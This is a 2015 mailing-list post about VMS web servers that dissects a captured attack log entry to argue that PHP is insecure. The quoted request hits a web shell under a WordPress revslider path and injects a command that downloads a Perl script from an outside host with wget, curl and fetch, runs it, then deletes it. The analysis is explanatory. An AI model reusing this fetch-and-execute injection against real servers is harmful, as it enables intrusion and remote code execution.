[Info-vax] Using VMS for a web server
Bill Gunshannon
bill at server3.cs.uofs.edu
Tue Jun 9 10:49:43 EDT 2015
In article <ml6qf1$d82$1 at news.albasani.net>,
Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>
>
> It would be nice to have a reproducer and test it out.
> Or at least a pointer to a description.
>
....
>
> OK. I have only read quite a lot about PHP and it's "problems"
> but never used it or had it installed on any server.
>
> But it would surprice me *a lot* if there wasn't an available
> fix for a simple URL based exploit...
OK, I wasn't busy (some of these updates are like watching paint dry!)
so here is just one to look at.
First, a log entry (sanatized a bit as I don't really need someone else
trying this):
103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Now, let's pull out the applicable part:
"GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
Now we analyze it:
"GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
There is a request to get a PHP script.
Note immedately after this part is "?cmd=" Hmmmmmm......
And what is the command?
wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
rm%20-rf%20qtalk.txt*
And if we break it down:
wget%20http://identerprise.co.kr/css/qtalk.txt;
curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
fetch%20http://identerprise.co.kr/css/b.txt;
perl%20qtalk.txt;
rm%20-rf%20qtalk.txt*
So, the attacker uses a hole in PHP to download a Perl script, using three
common ways of doing it (I don't know if any of these are available on VMS
but I suspect curl or wget might be). He then runs it. And when he is done
he cleans up his tracks.
What does it do? No idea. The point is to show something that PHP allows
as a "feature" that makes it probably the worst possible web scripting
language.
I have seen this method used to download a telnet daemon written in either
PHP or Perl. This allows outsiders who do not have an account on a system
to get in for a look around. Good way to look security shortcomings.
bill
--
Bill Gunshannon | de-moc-ra-cy (di mok' ra see) n. Three wolves
billg999 at cs.scranton.edu | and a sheep voting on what's for dinner.
University of Scranton |
Scranton, Pennsylvania | #include <std.disclaimer.h>
More information about the Info-vax
mailing list